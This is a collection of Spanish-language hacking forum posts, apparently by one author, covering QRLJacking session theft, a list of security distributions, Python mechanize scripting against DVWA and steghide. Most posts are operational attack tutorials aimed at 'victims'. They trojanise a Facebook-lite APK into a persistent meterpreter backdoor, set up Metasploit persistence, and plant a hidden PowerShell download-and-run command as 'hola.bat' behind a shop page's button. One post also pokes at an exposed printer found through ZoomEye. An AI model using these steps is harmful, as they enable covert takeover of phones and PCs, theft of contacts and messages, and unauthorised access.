si ustedes desean editarla es demasiado sencilla, se van al siguiente directorio:

Código: php
root@kali:~#  cd QRLJacking/QrlJacking-Framework




Entonces una ves que mi victima abra la pestaña de mi servidor malicioso, empezara a escanear el código :



En el momento precioso que la victima escanee el código, nosotros tendremos su sesión en segundo plano:



Muy sencillo verdad, ahora tu te preguntaras como mandar su servidor malicioso a tus vecinos que estén conectados a tu red, muy simple puedes ejecutar un MITM - dnspoof.

Con bettercap, MITMF, Xerosploit, Pythem!, hasta con el mismo Ettercap, si deseas ownear el sistema de tu victima te recomiendo utilizar Beef con cualquiera de las herramientas mencionadas y hacer la redirección en dicho framework:

Les dejare 2 posts,donde enseño a elaborar un MITM y utilizar el framework:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos!!!!!!
#11


Saludos nuevamente mis fieles lectores, en esta oportunidad no les traigo un POST como los de costumbre si no un arsenal de sistemas operativos orientados a la rama de la "Seguridad Informática" ha pedido de varios seguidores de mi fan page: CyberPunks Hackers 2007 - 2015.

Voy a dejar bien claro lo siguiente, hasta hace días atrás eh escuchado comentarios de estudiantes y algunas personas que dictan clases de seguridad informática, recomendar "Backtrack R3" por todos los santos, no utilices un sistema descontinuado y antiguo por el simple hecho que tiene muchos fallos de seguridad y puertas traseras descubiertas a lo largo de estos años, no solamente me refiero a Backtrack, si no también a las versiones primitivas de Kali Linux, les recomiendo utilizar la versión 2016.1 o 2016.2, actualicen siempre sus sistemas y servicios que tengan, ustedes saben que un sistema actualizado nace por un fallo en su versión anterior.

Bueno comencemos con este TOP, posdata: no utilicen "Wintendo" por nada del mundo, jamas utilices software privativo que tienen muchas puertas traseras y solo sirven para "comercializar".

Sistemas para Pentesters

"Kali Linux"

Inicio de Kali Linux, una distribución de Linux Prueba de Penetración avanzada utilizada para pruebas de penetración, Hacking Ético y las evaluaciones de seguridad de red.

Se lo simplificare de la siguiente manera Kali linux, es la continuación de Backtrack.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si deseas emularlo en una maquina virtual como "Vmware" o "Virtualbox", puede descargarlo aqui:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Consejo - escoger su arquitectura correcta.



"Parrot Security OS"

la distribución de Seguridad de GNU / Linux diseñado con pentesting nube y la seguridad de la IO en mente.

Incluye un laboratorio portátil completo para los expertos en seguridad y forenses digitales, sino que también incluye todo lo que necesita para desarrollar sus propios programas o proteger su privacidad con herramientas de anonimato y cifrado.

Este sistema operativo tomo fuerzas a principios del año pasado, sin duda un sistema que tiene mucho por mostrar y sobre todo mejorar.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



"BlackArch Linux"

BlackArch Linux es una distribución de pruebas de penetración basado en Linux del arco por pruebas de penetración y los investigadores de seguridad. El depósito contiene 1570 herramientas. Puede instalar las herramientas de forma individual o en grupos. BlackArch Linux es compatible con los actuales repertorios y servicios.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



"LIONSEC"

LionSec Linux 5.0 es una distribución basada en Ubuntu pruebas de penetración. Fue construido con el fin de llevar a cabo la informática forense, pruebas de penetración, análisis inalámbrica. Con el "Modo Anónimo", se puede navegar por Internet o enviar paquetes de forma anónima. Hay un montón de herramientas incorporadas como netool, websploit, burpsuite, herramientas de análisis web, herramientas de ingeniería social y otras herramientas Pentesting.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Este sistema operativo, fue creado por un conocido mio "LionSec", miembro del foro "Underc0de" - una comunidad con el único fin de compartir conocimientos Informáticos.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


"Drac0S"

es el sistema operativo Linux de la fuente de Indonesia, abierto construido en base a la Linux From Scratch bajo la protección de la v3.0 Licencia Pública General de GNU. Este sistema operativo es una variante de las distribuciones de Linux, que se utiliza para realizar pruebas de seguridad (pruebas de penetración). Linux Dracos en el brazo por cientos PenTest hidráulica, medicina forense y la ingeniería inversa. No utiliza una interfaz gráfica de usuario basada en herramientas-herramientas y sólo tienen el software utilizando el (interfaz de línea de comandos) CLI para realizar sus operaciones.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



"BackBox"

es una distribución Linux basada en Ubuntu. Ha sido desarrollado para realizar pruebas de penetración y las evaluaciones de seguridad. Diseñado para ser rápido, fácil de usar y proporcionan un entorno de escritorio mínimo pero completo, gracias a sus propios repositorios de software, siempre están actualizando a la última versión estable de las herramientas de hacking ético más utilizados y conocidos.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Sistemas de Anonimato

En esta sección tenemos los sistemas operativos basados en capas de seguridad entre protocolos de red conectados a SOCKS como tor, privoxy, las cuales trabajan con "NODOS", como también encontraremos servicios "VPN"(Virtual Private Networks) servidores privados de anonimato.

¿Existen sistemas que me ayuden a minimizar mi riesgo de ser descubierto?
Mi respuesta es si, minimizar es el termino correcto que se puede redactar, ya que si estas en Internet siempre seras vigilado por una entidad de telecomunicaciones privadas.

comencemos con el siguiente TOP:

Whonix - Anonymous Operating System

Whonix es un sistema operativo de escritorio diseñada para la seguridad avanzada y privacidad. Se aborda de manera realista los ataques mientras se mantiene la facilidad de uso. Esto hace que sea posible el anonimato en línea a través de su uso a prueba de fallos, automático, y en todo el escritorio de la red Tor. Una base de Debian en gran medida reconfigurado se ejecuta dentro de varias máquinas virtuales, proporcionando una capa sustancial de protección contra fugas de malware e IP. aplicaciones preinstaladas, pre-configurados con los valores predeterminados de seguridad están listas para su uso. Además, la instalación de aplicaciones personalizadas o la personalización del escritorio de ninguna manera poner en peligro al usuario. Whonix es el único sistema operativo desarrollado activamente diseñada para ejecutar dentro de una máquina virtual y se combina con Tor.



Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Tails - The Amnesic Incognito Live System

es un sistema vivo que tiene como objetivo preservar su privacidad y el anonimato. Se le ayuda a utilizar Internet de forma anónima y eludir la censura casi cualquier lugar y en cualquier equipo, pero sin dejar rastro a menos que pida que de forma explícita.

Es un sistema operativo completo, diseñado para ser utilizado desde un DVD, una memoria USB o tarjeta SD de forma independiente del sistema operativo original de la computadora. Es software libre y basada en Debian GNU / Linux.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Sin duda un buen arsenal, que deben de utilizar y testearlo personalmente los mencionados fueron utilizados por mi persona, por ende se los recomiendo.

siempre cuando vean que su sistema actual tiene una nueva actualización, utilicen estos 3 simples comandos para actualizar su sistema, repertorios y servicios, para protegerlo de agujeros de seguridad.

Código: php
apt-get update
apt-get upgrade
apt-get dist-upgrade


Actualizar todo tu sistema, te ayudara a minimizar el riesgo de ser Backdorizado por algún Tester.
Sin mas que decir, me despido espero haber aclarado dudas al respecto sobre que sistema operativo es mejor, por mi parte el Kali linux, porque trabaja con el entorno "DEBIAN", que es mi favorito.

Saludos y éxitos!

#12
Hacking / Generando Payload APK persistente con Spade
Diciembre 04, 2016, 01:50:53 AM


Saludos nuevamente x10 :v xD, en esta oportunidad les traigo una herramienta salida del horno llamada "SPADE", esta peculiar herramienta esta desarrollada en Python, su objetivo principal es "Compilar" un Payload en apk mediante una conexión "meterpreter" establecida con el Framework "Metasploit".

continuando con el POST, esta herramienta te ahorra el proceso de crear tu payload con extensión .apk en msfvenom o por el mismo metasploit, automatiza todo el proceso, solo debes añadir tu servidor y  tus puertos como normalmente se añaden tanto en un payload como en un Handle.

Descarga:

Código: php
root@kali:~# git clone https://github.com/suraj-root/spade.git
root@kali:~# cd spade


Luego de descargar y entrar a su carpeta, instalaremos las respectivas librerías para que el software cumpla sus funciones correctamente:

Código: php
root@kali:~# apt-get install lib32stdc++6 lib32ncurses5 and lib32z1 




Una vez completado la instalación de las librerías, deben descargar un aplicativo "APK", donde insertaremos nuestro payload desconpilando el código y procesando la información de la conexión, que haremos desde ese aplicativo infectado creado en spade que se camuflara con el "apk original" en mi caso escogí "Facebook-lite.apk".



Luego de copiar nuestro "APK" descargado en la carpeta raíz "spade", entraremos en nuestra terminal y añadiremos lo siguiente:

Código: php
root@kali:~/spade# ./spade.py facebook-lite.apk




Como vemos en las 3 primeras lineas, hemos añadido nuestro archivo llamado "Facebook-lite.apk" correctamente, luego nos sale las siguientes 6 opciones:

[1] android/meterpreter/reverse_http
[2] android/meterpreter/reverse_https
[3] android/meterpreter/reverse_tcp
[4] android/shell/reverse_http
[5] android/shell/reverse_https
[6] android/shell/reverse_tcp

Son el tipo de conexión que vamos a establecer para conectarnos desde nuestro servidor en mi caso escogí una session meterpreter reverse_http, la cual indico que estoy trabajando con el protocolo http, en la mayoría de conexión se utiliza el reverse_tcp, pero el resultado sera el mismo.

LHOST> 192.168.1.35    >>>>>>> Nuestra IP
LPORT> 8080                 >>>>>>> Nuestro Puerto de escucha

Luego de establecer nuestra configuración del servidor y el puerto de escucha, automáticamente comenzara el proceso de adicionan de permisos en el administrativos.




cuando me refiero a los permisos administrativos, me refiero que tendremos acceso a establecer todo tipo de servicios del dispositivo, entre ellos "Activar la Webcamp", establecer llamadas, extraer números de contactos, de mensajes, y todo lo demás, es mas se puede decir que tendremos mas privilegios que nuestra victima.

Luego que termine todo el proceso de compilamiento, nos aparece el siguiente mensaje:

  • Successfully backdoored and saved as facebook-lite-final.apk

    quiere decir que nuestro ejecutable apk, se creo correctamente con el nombre "facebook-lite-final.apk", El archivo se encuentra en la misma carpeta spade, luego de ello la subiremos a cualquier gestor de descargas y le enviaremos a nuestro victima, luego nos aparecerá el siguiente mensaje:

    Do you want to setup a listener?[y/n]y
    le daremos "Y" para que se inicia metasploit framework con nuestra configuración creada de nuestro payload.



    una ves que tengamos nuestro servidor en modo de escucha, solo faltaría que nuestra victima "Ejecute" el archivo y automáticamente tendremos acceso a su dispositivo móvil:



    Luego que nuestra victima halla instalado nuestro payload, tendremos acceso a su dispositivo.



    hemos comprometido el servidor por medio de un ataque POS-explotacion por medio de un payload infectado, como se los comente ustedes pueden extraer datos de contactos, registro de llamadas, de mensajes de texto, activar la webcamp, y ejercer todas las funciones del dispositivo.

    Cabe aclarar que este payload se genera de forma persistente, si deseas eliminarlo no podrás hacerlo, ha menos que rootes tu dispositivo y lo elimines por ese medio.


    Saludos!!!!!! 



#13


Saludos mis queridos fieles lectores bueno en esta oportunidad deseo aclarar lo siguiente hace mas de 1 año estuve aprendiendo Python pero lamentablemente deje de estudiar ese lenguaje por motivos personales, hace 2 semanas llevo aprendiendo nuevamente las bases y todo lo demás.

Cabe de decir que en todos mis aprendizajes que emplee en mi conocimiento, serán expuestos en el blog para compartir con ustedes mi mejoramiento.

Si deseas aprender python y dar tus primeros pasos en este lenguaje sencillo pero a la vez muy potente, dejare un post que realice hace mucho tiempo.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

¿Qué es Python?

Python es un lenguaje de alto nivel  orientado a objetos, La sintaxis de python   es muy limpia, su código es muy legible y es muy fácil de entenderlo.
Antes de comenzar por favor trata de leer el anterior POST.

Este escenario lo haremos desde el sistema operativo Kali linux - Debian, que por defecto lo tiene instalado, si utilizas un sistema Linux desde 0 puedes utilizar APT para instalarlo desde la terminal.

Código: php
root@kali:~# apt-get install python


Algo que debo mencionar, es que trabajemos con la versión 2.7.X.
Descarga:
Windows: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Mac  OS:  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Después de tener instalado Python puedes ejecutarlo por la misma terminal:



Cambien puedes utilizar un IDE yo recomiendo Ninja-IDE, lo pueden descargar de su pagina oficial:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En mi caso tengo que descargar la versión debian en formado .deb, para poder instalarlo.

Código: php
root@kali:~/Downloads# dpkg -i ninja-ide_2.3+r597~saucy1_all.deb 




También puedes instalar Sublime-Text para este escenario, para escribir código y activar su opción Build para poder ejecutar lo que estas programando, pero por mi parte no lo recomiendo, es mejor ejecutarlo por Ninja-IDE O por la terminal el archivo:  python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vamos a utilizar algunas librerías dedicadas al manejo de plataformas web, empecemos.

Mechanize:

Es una librería que nos permite interactuar con cualquier plataforma web, como si estuviéramos en un navegador gráfico, ya que manipularemos los envíos de las peticiones en cualquier tipo de instancia.

Mechanize tiene 2 componentes principales:

Browser   -  Nos permite interactuar de manera completa a cualquier servidor web.

Controles - Nos permiten interactuar con  la informacion  de un servicio en su mayoría de codificación html. 



En esta prueba de concepto vamos a elaborar las peticiones desde mi servidor que esta alojado en una maquina virtual corriendo en XAMPP, ustedes pueden observar que la plataforma es "DVWA".

Bien lo que primero haremos, sera añadir la librería en nuestro proyecto de la siguiente manera:

import mechanize
si no  tienes esta librería no te preocupes, puedes instalarla de esta manera desde tu terminal:

pip install mechanize

luego crearemos nuestros objetos para definir nuestras instancias, y empezar a enviar nuestra peticiones.



>>> import mechanize

Importamos nuestra librería mechanize. 

>>> brow = mechanize.Browser()

creamos una instancia del objeto Browser de mechanize, para poder hacer peticiones a los servidores http.

>>> respuesta = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta('No tienes permitido ver los links. Registrarse o Entrar a mi cuenta')

luego de ello utilizamos la instancia open para poder interactuar con nuestro primer objeto llamado brow y establecer una petición con url No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'

>>> print respuesta.geturl()

Entonces nosotros queremos recibir la respuesta del servidor, por ello le daremos print en el objeto respuesta y añadiremos geturl que nos permitirá obtener la url del servidor. 

>>> print No tienes permitido ver los links. Registrarse o Entrar a mi cuenta()

Nos permitirá poder recibir la respuesta de informacion del servidor.

Date: Mon, 21 Nov 2016 04:29:00 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.5.38
X-Powered-By: PHP/5.5.38
Set-Cookie: PHPSESSID=0h5f5rqpo4a06hduh8e067lg16; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=0h5f5rqpo4a06hduh8e067lg16; path=/; httponly
Set-Cookie: security=impossible; httponly
Content-Length: 1567
Connection: close
Content-Type: text/html;charset=utf-8
Content-Type: text/html; charset=UTF-8


Si nosotros podemos ver este tipo de informacion de la versiones del servicios que  tiene, podemos ver que nos arroja como resultado:


Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.5.38

Fácilmente podemos buscar "Exploits", para poder elaborar un ataque remoto si lo vemos de esa perspectiva.

Bien continuemos con esto, si nosotros deseamos enviar peticiones a formularios, en este ejemplo buscaremos "vulnerabilidades SQLi metodo POST", para ello tengo el siguiente escenario.



Nuevamente añadiré mi instancia y todo los procesos para poder establecer una respuesta del servidor. 

>>> import mechanize
>>> br = mechanize.Browser()
>>> respuesta = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta('No tienes permitido ver los links. Registrarse o Entrar a mi cuenta')


Luego vamos a establecer una búsqueda de todos los formularios que contenga el modulo del login.

>>> for form in br.forms():
...     print form
...


Vemos que nos arroja los siguientes formularios, en la linea 1 llamada login:

<login POST No tienes permitido ver los links. Registrarse o Entrar a mi cuenta application/x-www-form-urlencoded
  <TextControl(login_user=)>
  <PasswordControl(login_password=)>
  <SubmitControl(mysubmit=Login) (readonly)>>


comprobaremos si son los mismos formularios, desde el navegador web.


podemos observar que los formularios son los mismos, entonces no hay ningún problema.

Aclaremos los siguientes puntos, mechanize tiene la opción de poder manipular nuestros atributos y establecer los envíos de datos por su modulo submit.

Continuando con siguiente, debemos establecer que linea de formularios trabaremos, como solo existe el valor uno, de manera lógica se establece como 0, si existieran 2 y nuestro formulario estuviera de bajo del primero seria 1

>>> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta_form(nr=0)

luego de añadir el numero del formulario que trabajaremos.
Vamos añadir los atributos a los respectivos formularios, en esta prueba hemos utilizado un conocido Bypass = ' or 1=1--

>>> br.form['login_user'] = "' or 1=1--"
>>> br.form['login_password'] = "' or 1=1--"

Entonces enviaremos nuestra petición al servidor de la siguiente manera.

>>> br.submit()

<response_seek_wrapper at 0xb73fd12cL whose wrapped object = <closeable_response at 0xb74030ecL whose fp = <socket._fileobject object at 0xb746ed6c>>>

Vemos que nos ha enviado una respuesta, ahora lo que debemos hacer por ultimo es leer la fuente de la pagina ver, para ver que respuesta nos ha arrojado.

>>> print br.response().read()


<html>
<head>
</head>
<body bgcolor="#000000">
<font size="3" color="#FFFF00">
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a>
</div>

<font size="5" color= "#FFFF00">You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1</font><tr><td colspan="2" style="text-align:center;"><br/><p style="color:#FF0000;">
<center>
<img src="../images/slap1.jpg">
</center>
</p></td></tr>

Testing



Sencillo verdad, pero solo estamos estableciendo valores definidos por nosotros mismos, para poder entender Python desde esa perspectiva, para después crear nuestra propios herramientas y establezcan las funciones por si mismas.

Un consejo, si eres el master de una web trata de controlar y ver los registros de las conexiones entrantes.



Si en vez de establecer una petición para auditoria, deseamos entrar a un panel administrativo por medio de sus credenciales.

pues entraremos nuevamente en la plataforma DVWA



Pero como estaremos en un panel administrativo debemos definir nuestra Cookie, para poder establecer conexión persistente desde la terminal, para ello utilizaremos el modulo: cookielib



>>> import mechanize
>>> import cookielib
>>> br = mechanize.Browser()


La libreria Cookielib sirve para poder establecer una Cookie, para establecer conexión de usuario sin perderla al momento de actualizar o retroceder.

Luego de ello, hemos instanciado nuestro objetivo Cookiejar, para establecer su función con nuestro modulo mechanize. 

>>> cj = cookielib.LWPCookieJar()
>>> br.set_cookiejar(cj)


Aquí estamos diciendo que no utilizaremos buscada de robots.

>>> br.set_handle_robots(False)

Luego de ello, los que le comentaba si nosotros actualizamos la plataforma por la terminar o regresamos, se nos cerrara la sesión ya que no establecimos el proceso de disponibilidad.

>>> br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)

se acuerdan que hace momentos mostré los registros de conexiones por XAMPP, en esta instancia nos permite poder modificar nuestros agentes de usuario, quiere decir que podemos hacernos pasar por una sistema MAC OS y simular que estamos navegando desde el navegador Opera.

>>> br.addheaders = [('User-agent', 'Opera/9.25 (Macintosh; PPC Mac OS X; U; en)')]


Entonces estableceremos la URL,que deseamos enviar peticiones.

>>> r = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta('No tienes permitido ver los links. Registrarse o Entrar a mi cuenta')

ahora haremos nuevamente una búsqueda de formularios.


>>> for form in br.forms():
...    print form
...


<POST No tienes permitido ver los links. Registrarse o Entrar a mi cuenta application/x-www-form-urlencoded
  <TextControl(username=)>
  <PasswordControl(password=)>
  <SubmitControl(Login=Login) (readonly)>
  <HiddenControl(user_token=e8db4eb8dbfcad683b1ab919c61cb253) (readonly)>>

Si tu defines los atributos, sin especificar con que formulario desees trabajar, te saldrá error, por el simple hecho de no asignar el objeto.

>>> br.form['username'] = 'admin'

Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: 'NoneType' object does not support item assignment

Entonces procederemos a elaborar dicha función correctamente asignando el valor 0, ya que en programación el valor inicial 1 es igual a 0

>>> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta_form(nr=0)

Añadiremos nuestros atributos ( las credenciales reales )

>>> br.form['username'] = 'admin'
>>> br.form['password'] = 'password'


Enviaremos nuestro petición.

>>> br.submit()

<response_seek_wrapper at 0xb73d9a6cL whose wrapped object = <closeable_response at 0xb73f004cL whose fp = <socket._fileobject object at 0xb73ce9ac>>>

leeremos la respuesta del servidor por medio del código fuente.

>>> print br.response().read()



Comprobaremos si es el mismo código por medio del navegador gráfico.



Correcto, siempre cuando hagan consultas desde mechanize deben tener en claro que están interactuando como si fuese desde un navegador gráfico, pero desde la terminal.

ahora miremos los logs o registros del servidor apache para ver si nuestro agente de usuario que es Mozilla/Firefox  - Linux 32bits a cambiado a Opera - Mac OS



Espero les halla encantado este humilde articulo, me despido estaré estudiando mas métodos para poder continuar con este pequeño curso de Python.

Saludos!!!!
#14


Saludos nuevamente hermanos de underc0de, de nuevo vengo a joderlos jajaj okno, bueno en esta oportunidad les traigo un buscador parecido a Shodan, pero que tienen aun mas información que el mencionado, algunos la están catalogando como la hermana de SHODAN, para mi es un proyecto muy interesante, es de origen chino y fue desarrollado en el año 2014 les presento a ZoomEye

Pagina:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Un pequeño ejemplo de ello, si tu deseas utilizar la vista de mapa en ZoomEye es muy útil, pero a su vez algo tedioso ya que al buscar un determinado servicio les aparece lo siguiente:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Veamos algunos de sus "Dorks", ustedes se asombraran con los siguientes:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Me pareció interesante ver 2 dorks con el framework metasploit, viendo la información de uno de ellos me percate lo siguiente.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Te indica que el servidor esta backdorizado y también te muestra el código del payload corriendo, sin duda este servidor de china esta mas owneado que una web No tienes permitido ver los links. Registrarse o Entrar a mi cuenta xD

veamos a las impresas conectadas en WAN, cuantas tienen su servicios disponibles para ser manipuladas.



Veamos entremos, en mi caso yo entre a una de EE.UU:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Status: Connected
Host Name: HPD0DD7C
IP Address: 192.168.0.15
Hardware (MAC) Address: 68B599CFDE7E
SSID: HOME BASE 2.4G



Modelo:

Product Name     HP Officejet Pro 8500 A910
Product Model Number     CM755A
Product Serial Number     CN0B4AR2HJ
Service ID     21015
Firmware Version     LRP1FN1621BR
Total Page Count     13635
Country/Region 



como pueden observar acabo de enviar una imprisión de prueba.
para poder entrar a mas servicios privados deben registrarse en el siguiente enlace:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Algo importante que tengo que mencionar y también explicar porque no hago tan extenso este articulo, el 70 % de Dorks son similares a shodan, así que prueben este servicio se los recomiendo.

posdata: tengo sueño  xD

Saludos!

#15
Hacking / Creando Backdoor Persistente en metasploit
Diciembre 04, 2016, 12:18:02 AM


Saludos fieles lectores en esta oportunidad les traigo un POST sobre como crear tu Backdoor persistente en msfconsole, ha pedido de un seguidor del blog que me dejo un mensaje en privado.

¿Que es Backdoor?

se le domina como puerta trasera, cabe decir que se ejecuta un "Script" remoto a la maquina de la victima con conexion puente al ordenador del atacante, para dejar al sistema vulnerado en escucha siempre.

El Backdoor persistente es compatible con todas las versiones de Windows.

Lo primero que deben tener en cuenta es lo siguiente, penetrar el sistema de tu victima, dejo los siguientes posts donde enseño como hacerlo por diferentes métodos, de igual manera burlar los "AV":


Luego de crear tu "Payload", posteriormente enviar el archivo infectado a tu victima tendremos su session meterpreter, en este caso haré la prueba de concepto en un Windows 7 service pack 1



Entonces lo que haremos sera ejecutar el comando persistente por default.
Código: php

meterpreter > run persistence

voy a dejar bien claro lo siguiente, al ejecutar el comando run persistente estas dejando todo por Default, por ejemplo:

El puerto: 4444
IP: 192.168.1.35 (tu IP se adjuntara automáticamente)
Script Upload - directorio donde se alojara el Script vbs, que se ejecutara al momento que inicie el sistema de la victima.



Como vemos el archivo se subió correctamente en la carpeta por default.



Entonces reiniciaremos el equipo de la victima para ver si realmente nos carga  su sesión meterpreter, pero antes configuraremos el puerto de escucha, ya que en la infección se utilizo el puerto 5555.



Esperemos que cargue nuevamente el sistema windows, pero vemos en la siguiente imagen que hemos cambiado el puerto de escucha reemplazando el 5555 a 4444 que fue generado al momento de ejecutar persistence.



Como podemos observar automáticamente hemos tenido la conexión meterpreter.

ahora viene la pregunta de muchos:

¿si yo deseo establecer una IP y puerto diferente?

Pues sencillo vamos a utilizar algunos argumentos de persitence, un ejemplo es el siguiente:

Código: php
run persistence -U -i 5 -p 4444 -r 192.168.1.35


-U >> ejecuta automáticamente el usuario comprometido y establece logs.
-i  >> segundos de conexión para establecer. 
-p >> puerto de escucha.
-r >> IP de la maquina del atacante a añadir.




Entonces le añadí de igual manera el puerto 4444, y deje mi IP estatica por default, ya que es mi maquina de ataque:

Reinicie bruscamente el windows 7, entonces esperaremos a que cargue nuevamente.   



de igual manera hemos tenido su sesión meterpreter automáticamente, configurando nuestro propio script persistente.
#16


Saludos nuevamente mis queridos fieles lectores, en esta oportunidad les traigo un nuevo método de ataque de POST EXPLOTACIÓN por medio de un modulo llamado Web Delivery, que nos permite crear archivos "Maliciosos" con extensiones Python, php y powershell,  en este tutorial utilizaremos la extensión universal por defecto de windows ps - Powershell.

Primero arrancaremos el framework metasploit, luego configuraremos el respectivo exploit:


Código: php

msf > use exploit/multi/script/web_delivery - Estableciendo Web Delivery
LHOST => 192.168.1.35                              - Nuestra IP
LPORT => 8081                                           - Nuestro puerto de escucha
msf exploit(web_delivery) > set URIPATH / - Directorio PATH del servidor
msf exploit(web_delivery) > show targets 
msf exploit(web_delivery) > set target 2     - Escogimos 2 = PowerShell
msf exploit(web_delivery) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > exploit


una ves entendido lo anterior, lo que hicimos fue crear nuestro servidor meterpreter en escucha y nos apareció lo siguiente en las lineas abajo


powershell.exe -nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('No tienes permitido ver los links. Registrarse o Entrar a mi cuenta');

Algunos quizás no tengan entendimiento de ello, se los simplificare de la siguiente manera, este es el código fuente del archivo powershell que nos permitirá obtener la conexión de nuestra victima una ves que ejecute dicho archivo.



Como vemos este archivo lo eh guardado en formato .bat, para camuflarlo de algunos AV, lo llame "hola.bat" y lo aloje a la carpeta: /var/www/html donde se almacena nuestro archivos del servidor local apache.

¿Ustedes se preguntaran porque?

Es simple porque pienso utilizar un index de una pagina de "Ventas" online de comida y adjuntar mi archivo infectado .bat en un botón.

Antes de pasar este proceso, activen su servidor apache:
Código: php

root@kali:/# service apache2  start




Les dejare un pequeño ejemplo:

Source original:

<input name="input" value="" onclick="setLocation('No tienes permitido ver los links. Registrarse o Entrar a mi cuenta')" type="button">


Source editado

<input name="input" value="" onclick="setLocation('192.168.1.35/hola.bat')" type="button">

solamente le reemplazan la URL original por su dirección de archivo.

Una vez hecho todo este proceso, le envían la URL a su victima en mi caso yo lo estoy asiendo en mi red local, ustedes pueden hacerlo desde una web externa si desean.



Como vemos en el momento que nuestra victima haga clic en el botón automáticamente se descargara nuestro archivo "hola.bat", entonces aquí viene lo mejor  "La curiosidad del ser humano, cuando se presenta una oportunidad", quiere decir que una ves la victima ejecute el archivo, tendremos su sesión meterpreter.




Espero hallan aprendido algo nuevo de este servidor, para mi es un placer enseñarle lo poco que se.
Saludos y éxitos!
#17


Saludos nuevamente mis fieles lectores en esta oportunidad les traigo la herramienta Steghide, que sirve para ocultar nuestros archivos en un formato de imagen, utilizando el proceso de esteganografía.

Steghide  es un programa de esteganografía que permite ocul­tar datos en varios tipos de imagen- y archivos de  audio.

Los respectivos muestreos de frecuencia de color no varían lo que hace que el adjunto  soporte  pruebas  estadísticas del primer orden.
Sus características incluyen el compactado y el encriptado de los datos adjuntos, y revisión automática de integridad usando  un  checksum. Se reconocen los formatos de archivo JPEG, BMP, WAV y AU para usar como archivos de portada. No existen  restricciones en el formato de los datos ocultos.

Referencia:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En este escenario lo ejecutaremos en Kali linux (Debian), primero debemos instalarlo.

Código: php
root@kali:~# apt-get install steghide




En mi caso ya tenia instalado el steghide, pero la añadir nuevamente su instalación se ha actualizado una nueva versión.
Una ves instalado lo siguiente haremos un ejemplo con un archivo .TXT y una imagen en JPG.



Como vemos los archivos que utilizaremos son:

Código: php
    oe.txt
    rosangela-espinoza.jpg


Entonces lo que haremos sera empezar con el procedimiento:

Código: php
root@kali:~/Desktop# steghide embed -cf rosangela-espinoza.jpg -ef oe.txt


embed > sirve para adjuntar  el archivo txt en la imagen de formato jpg



Luego de añadir sus respectivos argumentos, nos saldrán 2 lineas que nos dirán "salvoproducto", la cual deben ingresar una contraseña en mi caso añadí:

tujefaxD

una ves hecho el procedimiento empezara nuestro proceso de ocultación, entonces veremos como quedo nuestro archivo.



Vemos que la imagen no ha sufrido ninguna modificación gráfica, ni en su extensión, pero debo aclarar los siguiente: que dependiendo de la cantidad de almacenamiento del archivo que deseamos ocultar, nuestra imagen tendrá también dicho peso.

Pero como mi archivo oe.txt tiene menos de 8 caracteres no aumentado el tamaño del archivo.



Bueno entonces, que pasaría si deseas extraer el archivo oculto en la imagen, en mi caso yo soy algo paranoico mis contraseñas las tengo siempre en local en un txt en mi pendrive, pero gracias a  steghide lo puedo ocultar en un formato de imagen, que solo le permitirá leer al que ejecute el archivo la imagen y no en texto plano donde verdaderamente se encuentra mi password.



vemos que se ha extraído completamente el archivo "oe.txt"



comprobamos que no ha sido afectado ninguna carácter de mi supuesta password, espero les halla gustado este articulo.
no solamente pueden adjuntar un archivo de texto, si no cualquier tipo de archivo que deseen ocultar.

Un saludo!! 
#18


Hace aproximadamente un mes, la comunidad linuxera (incluyéndome) se entero de una noticia que simplemente no se podría creer, un fallo de hace 9 años nuevamente estaba presente exponiendo un gran agujero de seguridad en las versiones: Ubuntu 14.04 y Ubuntu 15.10.

las consecuencias que con lleva son catastróficas, permite al atacante obtener privilegios root por medio de dicho una explotacion local, exponiendo todo el sistema de la victima sin ninguna excepción.

el bug también afecta a todos los dispositivos android de la versión 7 para abajo.

Elevando privilegios de usuario a root en Ubuntu 15.10



Exploit:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

